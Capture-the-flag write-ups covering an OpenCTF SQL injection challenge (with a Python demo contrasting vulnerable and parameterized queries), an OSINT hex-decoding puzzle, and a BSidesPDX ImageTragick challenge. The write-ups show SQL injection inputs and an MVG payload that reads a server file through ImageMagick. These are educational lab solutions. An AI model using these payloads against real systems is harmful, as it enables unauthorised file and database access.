Aug 12, 2018 - OpenCTF : SQL 10

Author: Fl0rbu5

Publish Date: 2018-08-12

Category: Web

Points: 10


When 1 is entered it returns the following row:

Enter a badge number to view that officers file:1
(1, 'bob', 'simmons', 'none')

Performing a basic SQL injection, we got the same row back with no error. The server only returns 1 row.

Enter a badge number to view that officers file:1 or 1=1
(1, 'bob', 'simmons', 'none')

Entering an ID of 2, no results are found.

Enter a badge number to view that officers file:2 

Using the SQL injection, an OR was added with the condition “id>2”.

Enter a badge number to view that officers file:2 or id>2
(152135123451, 'flag', 'flag', '[email protected]@[email protected]')

This returns the flag, which is in the one other row in the database.


[email protected]@[email protected]
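The behaviour seen above (one row back for "1 or 1=1", the flag row for "2 or id>2") is reproduced below next to a parameterized lookup that rejects both inputs. This is an added example, not the challenge's source: the table name, the column names other than id, the flag placeholder and the fetch-first-row behaviour are assumptions.

```python
import re
import sqlite3

def make_db():
    """Constructed stand-in for the challenge database (two rows, as in the writeup)."""
    db = sqlite3.connect(":memory:")
    # Table and column names other than "id" are assumptions.
    db.execute("CREATE TABLE officers (id INTEGER, first TEXT, last TEXT, notes TEXT)")
    db.executemany("INSERT INTO officers VALUES (?, ?, ?, ?)", [
        (1, "bob", "simmons", "none"),
        (152135123451, "flag", "flag", "FLAG_PLACEHOLDER"),  # placeholder value
    ])
    return db

def lookup_vulnerable(db, badge):
    # Assumed server behaviour: the input is pasted into the SQL text and only
    # the first matching row is fetched, so "1 or 1=1" still shows one row.
    query = "SELECT * FROM officers WHERE id = " + badge
    return db.execute(query).fetchone()

def lookup_hardened(db, badge):
    # Accept only a short run of ASCII digits, then bind it as a parameter so
    # the value is never parsed as SQL.
    if not re.fullmatch(r"[0-9]{1,18}", badge.strip()):
        return None
    query = "SELECT * FROM officers WHERE id = ?"
    return db.execute(query, (int(badge),)).fetchone()

if __name__ == "__main__":
    db = make_db()
    for badge in ("1", "1 or 1=1", "2", "2 or id>2"):
        print(repr(badge), lookup_vulnerable(db, badge), lookup_hardened(db, badge))
```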

Aug 12, 2018 - OpenCTF : Ellingson Mineral 2

Author: Fl0rbu5

Publish Date: 2018-08-12

Category: OSINT

Points: 100


We heard word that The Plague escaped prison three weeks ago. We've been notified that he was recently seen on soundcloud liking a song by ytcracker called "hacker music." Let us know what you find.

First, perform a search for “ytcracker hacker music”, then go to the likes.

Go to ThePlague2018x’s profile

The next clue seemed to be to go to ThePlague2018x’s website, which is the following:

Extract the string between the percent-encoded “%3A%2F%2F” (the URL-encoded form of “://”) and “.com”. The value between them is the following:


Looking at the string, it seems to be hex, so decode it from hex to get the flag.

>>> bytes.fromhex('666c61677b74684552655f69735f4e305f72314768745f614e445f5752306e475f74683352655f31735f4f4e6c795f46754e5f416e645f423072694e477d').decode()



Oct 21, 2017 - BSidesPDX CTF : MakeIcon

Author: dade

Publish Date: 2017-10-21

Category: Web

Points: 300


It's free, as in baby.



The BSidesPDX organizers have made the source code for all of their challenges freely available so that you can run them at home and follow along. You can find more information here.


Upon loading the screen, we are presented with a file upload and a button to make a jpeg icon. We also note that the version string, Version 2016.3717, indicates it was made in 2016. After playing around with it for a little while, I thought about how there was that ImageMagick bug last year that let you execute code remotely. I wasn’t sure it would work, but it was worth a shot.

As I hunted down the ImageMagick bug, it became painfully apparent that the Version string provided to us was also the CVE number associated with the ImageTragick bug.

From the ImageTragick site, I decided to take the read_file.mvg file and tweak it to meet my needs.

push graphic-context
viewbox 0 0 64 48
image over 0,0 0,0 'label:@/flag'
pop graphic-context

I suspected that the flag would be in /flag since we had solved other challenges where the flag was in /flag. Luckily I was right, and upon upload I was presented with the first few characters of the flag. Unfortunately I didn’t realize there was a hidden field being sent to determine the output size of the icon, so I wasted a lot of time coming up with this solution.


I uploaded the read_file.mvg file a total of 5 times, modifying the image over line each time in order to shift what I was able to view and move along the string. In order to do this, I had to set the first value (immediately after ‘over’) to -64, -128, -192, -256, and -320. This allowed me to read each section of the flag inside the tiny 64x48 viewport, instead of just modifying the hidden field to produce a bigger image.